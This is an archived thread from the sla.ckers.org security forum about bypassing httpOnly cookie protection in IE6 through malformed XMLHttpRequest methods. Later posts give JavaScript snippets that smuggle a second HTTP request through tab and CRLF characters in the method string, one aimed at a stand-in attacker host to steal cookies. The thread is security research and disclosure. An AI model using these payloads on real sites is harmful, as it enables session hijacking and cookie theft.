Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: December 31, 2006 09:48AM

I hope i didn't miss someone writing about it here already:

It seems that IE6 doesn't allow reading cookies from xhr.getResponseHeader('Set-Cookie') or xhr.getAllResponseHeaders(). At least, as long as the xhr method is set to "GET". If you change it into e.g. "GET x", you can read all cookies from Set-Cookie headers (including httpOnly cookies). Do you know any place I could read about other ways to bypass httpOnly with XHR?

( short testpage: http://lukasz.pilorz.net/testy/httponly/ - works for me in IE6 on Win2k/XP, doesn't work in IE7 on Vista)



Edited 2 time(s). Last edit at 12/31/2006 09:55AM by lpilorz.

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: December 31, 2006 11:06AM

Quote

If you change it into e.g. "GET x"

How'bout that! great find! I haven't seen this yet. Good example where I guess RegExes fail to work.

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: December 31, 2006 07:06PM

It seems I was wrong a bit (hey, I won't look for IE bugs in the middle of New Year's Eve party any more ;)):

Problem with reading cookies with XHR comes from caching, not built-in IE protection. Anyway, changing GET/POST method into something else ("GET x" or "WHATEVER YOU WISH") allows bypassing those caching problems.

Reading cookies from Set-Cookie header with XHR isn't very useful either - or am I wrong? Usually you get that header before you are able to use XHR.

By the way, Stefan Esser's httpOnly extension for Firefox seems to be immune for XHR cookie stealing.



Edited 1 time(s). Last edit at 12/31/2006 07:10PM by lpilorz.

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: kuza55
Date: December 31, 2006 07:49PM

lpilorz Wrote:
-------------------------------------------------------
> Reading cookies from Set-Cookie header with XHR
> isn't very useful either - or am I wrong? Usually
> you get that header before you are able to use
> XHR.
>
> By the way, Stefan Esser's httpOnly extension for
> Firefox seems to be immune for XHR cookie
> stealing.


Generally its not very useful, no, but if you have pages where you can somehoe force the websites to regenerate your session cookie or something (unlikely, but possible) and resend it to you, then it would be useful.

And I don't think its Stefan Esser's being immune, I think its just firefox being immune. I say this because it doesn't work for me and I don't have the extension installed since I haven't gotten around to upgrading to FF2.0 yet - yes, lazy me, but why can't they make the automatic update do it?

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: January 01, 2007 05:36AM

You're right about that cookie regeneration. I wonder how many web apps have such pages (not much, from what I know).

XHR on the test page uses "WHATEVER YOU WISH" HTTP method, which causes Firefox to throw error - that's the reason it doesn't show cookies. If you change it into GET, httpOnly (and all other) cookies should appear. httpOnly extension overwrites this cookies with some random value.

By the way, browsers give different results for xhr.GetResponseHeader("Set-Cookie"). IE6 returns only first Set-Cookie header, while Opera9 (which also allows "WHATEVER YOU WISH" HTTP method) returns combined values of all the Set-Cookie headers.

Testpage with GET method set correctly: http://lukasz.pilorz.net/testy/httponly/get.php

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: January 01, 2007 07:37AM

I've got a question: I'm modding my own version of FireFox, trouble is; I don't know exactly what that HttpOnly is doing and if you can run into trouble at site who require javascript to access cookies. I understand it blocks javascript from reading the cookies but then my question is: Do some websites still use javascript to read the cookies? I think, there must be a reason why FF did not inplement this from the beginning? If anyone can elaborate on this I'll be happy :)

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: WhiteAcid
Date: January 01, 2007 10:01AM

Jungson. It's the developers of the website that set the HTTPOnly flag. If it's not set, then the cookie isn't HTTPOnly. So... if they've set the flag and do use document.cookie, then it's their fault that the site dies.

I'm guessing a reason Mozilla didn't implement it is because it's not a standard. I know PHP support the creation of HTTPOnly cookies, I suppose ASP does, does anyone know if perl can do it? (besides manually writing the header line)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: lpilorz
Date: January 01, 2007 02:54PM

Yes, Perl's CGI::Cookie has httponly attribute:
http://search.cpan.org/dist/CGI.pm/CGI/Cookie.pm

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 02, 2007 02:04PM

Jungsonn, I have seen a number of examples where applications have JavaScript that read from cookies. One reason for this is the "Hello soandso, welcome to our site." For some reason or another they have chosen to write that with a cookie (probably to reduce server load). That can lead to potential XSS if you can force the user to change their cookie to something and assuming the JavaScript doesn't do validation. But anyway, yes, there are a number of applications that do exactly this that may or may not use HTTPOnly cookies. Also, for those of you who aren't aware HTTPOnly isn't just non-standard it actually can break certain older browsers causing the page not to load (WebTV, and IE5.0 on Mac comes to mind). So you need to build a whitelist or just not worry about that subset of users.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: jungsonn
Date: January 02, 2007 02:32PM

Thanks, so it can be implemented in new versions of FF i guess? I can remember i've seen it, but that's was very early like in 1998 and so.

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 02, 2007 03:05PM

Well it doesn't break anything in Firefox, but for some reason they've had problems making it work. Stefan seemed to be able to do it but the developers at Firefox feel it will break things or it is difficult to know what context JavaScript should be allowed to see cookies or not.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: Kanatoko
Date: January 06, 2007 07:53AM

Cool topic, lpilorz :)

On IE, We can use 0x09 in xhr method.
So HRS(HTTP Request smuggling) is possible with the following code

example1:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\n\r\nGET";
req.open( method, 'http://example.com/',false );
-----

example2:
-----
var method = "GET\x09/index.php\x09HTTP/1.1\r\nHost:foobar\r\nX-Foo:";
req.open( method, 'http://example.com/',false );
-----

It works with Apache.
I think 'TRACE\x09...' and 'POST\x09...' will also work. ( Not tested yet )

This technique can be used to steal httpOnly cookies, in some cases.

--
Kanatoko
http://www.jumperz.net/

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: Kanatoko
Date: January 06, 2007 12:54PM

Under following conditions:
- The user is using a proxy ( tested on Apache and Squid )
- The proxy disables TRACE method
- The user is using IE
- www.example.com has a XSS hole
- www.example.com uses cookies with httpOnly flag
- www.example.com disables TRACE method

It is possible to steal cookies with:
(please replace 'htp://' to 'http://' )
-----
method = "GET\x09htp://www.attackers.com/\x09HTTP/1.1\r\nHost:www.attackers.com\r\nX-Foo:";
req.open( method, "http://www.example.com/", false );
req.send( null );
-----

#By the way, how can I avoid 'http://...' hyperlinking at here?

--
Kanatoko
http://www.jumperz.net/



Edited 1 time(s). Last edit at 01/06/2007 01:00PM by Kanatoko.

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: rsnake
Date: January 09, 2007 10:17AM

You could hyperlink one character like the colon h t t p [ u r l=h t t p : //ha.ckers.org]:[/url]whatever.com without all the spaces...

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Stealing httpOnly cookies with XHR
Posted by: maluc
Date: January 09, 2007 03:35PM

You could also bold the space character before it (bold because it's very short to type)

[ b ] [ / b ]http://test.com

test of it: http://test.com

-maluc



Edited 1 time(s). Last edit at 01/09/2007 03:36PM by maluc.

Options: ReplyQuote


Sorry, only registered users may post in this forum.